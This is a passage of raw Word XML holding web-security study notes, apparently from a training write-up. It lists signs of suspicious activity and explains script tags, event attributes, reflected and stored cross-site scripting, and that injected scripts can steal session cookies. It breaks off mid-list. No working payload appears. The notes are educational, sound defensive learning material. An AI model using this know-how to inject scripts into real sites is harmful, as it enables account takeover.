          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Important to store multiple accurate copies securely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E860179" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Detecting Suspicious Activity such as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F351D3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Multiple unauthorized attempts for a particular action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429707CF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Requests from anomalous IP addresses or locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37136937" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use of automated tools – using the value of User-Agent headers or speed of requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB834B9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common payloads – XSS payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCBA3ED" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Detection must also be rated in severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5CABB7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Creates priorities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434659E" w14:textId="048580F2" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Review of logs help detect patterns, tactics, strategies employed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B071A0" w14:textId="56724CFD" w:rsidR="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Christmas XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA5D32" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Web pages are made of 3 common components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7205F4CB" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTML - this is the syntax used to define the content and structure of a web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D0156" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CSS - this is a language used to design and style the content of the web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179282A" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Javascript - this is a language that is used to provide interactivity and animation to a web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0006D0FE" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Javascript is very powerful and provides a lot of functions on a web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208C4BCF" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41450C22" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Most Javascript code is found inside </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF43DB" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;script&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460AD152" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These tags on a web page. The javascript code is either added directly between these tags or is called in a file using the src attribute inside the opening script tag e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D0970" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;script src=’location-to-file’&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172FCE94" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In general, the javascript inside the script tags is always executed when the page is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014C2C8" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57814347" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>One of the other locations Javascript can be added to is attributes inside other HTML tags. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FEE5B8" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;a href=’/link’ onclick=’code-here’&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF7F0A" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This HTML tag opens a link, but the onclick attribute executes Javascript code when the text specified by the HTML tag is clicked. The execution of the javascript in the attribute depends on the attribute e.g. onload will only execute javascript when the element is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A796923" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC360FF" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486CE516" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A lot of different websites require user input. This includes everything from adding posts to a form to adding an amount in a bank transfer. We’ve seen that websites require Javascript to </w:t>
      </w:r>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>work properly. A malicious user could easily inject javascript into a page and perform malicious actions. This type of an attack is called XSS(Cross Site Scripting). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D5DA7" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741E8F47" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B9F29" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reflected XSS is when arbitrary javascript is reflected off a server(and is not permanent). This is done in scenarios like error pages, links where the payload is passed as a request and also included in the response. The most common case for this is when an attacker sends a URL containing a malicious payload to the victim. The victim would click this URL and the payload would be executed(we’ll explore what exactly we can do with a Javascript payload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5D836" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B04742B" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E98CAE" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stored XSS is when arbitrary javascript is stored on a database and this javascript is retrieved and displayed to a user. This tends to be more dangerous than reflected XSS as the payload is automatically passed(and even executed) to a user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC6E11B" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB67FE1" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Why is it dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54C7FC" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>As mentioned above, Javascript is very powerful and an attacker can do many things with Javascript:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3188E1F1" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steal session cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50BAC2" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E5473">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This would allow an attacker to access a user’s account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13198703" w14:textId="77777777" w:rsidR="000E5473" w:rsidRPr="000E5473" w:rsidRDefault="000E5473" w:rsidP="000E5473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
